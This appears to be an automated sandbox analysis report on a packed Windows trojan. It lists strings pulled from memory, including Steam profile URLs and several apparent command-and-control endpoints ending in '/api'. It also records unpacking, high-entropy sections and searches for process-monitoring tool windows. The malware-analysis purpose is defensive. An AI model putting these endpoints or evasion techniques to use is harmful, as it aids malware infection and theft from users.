    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=w
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/s
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHI
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eaglepawnoy.store:443/apiF
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://licendfilteo.site:443/api
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobbipenju.store:443/api
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201867746.0000000001239000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249509105.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/L
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/T
    Source: file.exe, 00000000.00000002.2249509105.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249509105.0000000001239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000003.2201867746.0000000001239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api&
    Source: file.exe, 00000000.00000002.2249509105.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api1
    Source: file.exe, 00000000.00000002.2249509105.0000000001239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apij
    Source: file.exe, 00000000.00000003.2201867746.0000000001239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/sWO%(
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api:.
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spirittunek.store:443/api
    Source: file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000003.2201946477.0000000001203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201946477.0000000001203000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900N
    Source: file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://studennotediw.store:443/api
    Source: file.exe, 00000000.00000003.2201867746.0000000001239000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000000.00000003.2201867746.0000000001239000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201946477.0000000001203000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249509105.0000000001201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manag
    Source: file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49713 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005702280_2_00570228
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056A8500_2_0056A850
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005720300_2_00572030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AA0D00_2_005AA0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059E8A00_2_0059E8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005651600_2_00565160
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E1A00_2_0056E1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A4A400_2_005A4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056A3000_2_0056A300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058C4700_2_0058C470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058CCD00_2_0058CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057049B0_2_0057049B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005744870_2_00574487
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00567CA40_2_00567CA4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058FD100_2_0058FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057C5F00_2_0057C5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005685900_2_00568590
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005635B00_2_005635B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056BEB00_2_0056BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00576EBF0_2_00576EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056AF100_2_0056AF10
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 0057D300 appears 47 times
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 1928
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9994972153465347
    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/5@10/2
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2488
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\d645a753-fb03-476a-abdb-7d35419e57e9Jump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeReversingLabs: Detection: 34%
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 1928
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 1948
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 2920960 > 1048576
    Source: file.exeStatic PE information: Raw size of twgwikas is bigger than: 0x100000 < 0x29fc00

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.560000.0.unpack :EW;.rsrc :W;.idata :W;twgwikas:EW;wmevupse:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;twgwikas:EW;wmevupse:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x2cbaf1 should be: 0x2d8e3c
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name: twgwikas
    Source: file.exeStatic PE information: section name: wmevupse
    Source: file.exeStatic PE information: section name: .taggant
    Source: file.exeStatic PE information: section name: entropy: 7.979992448836906

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
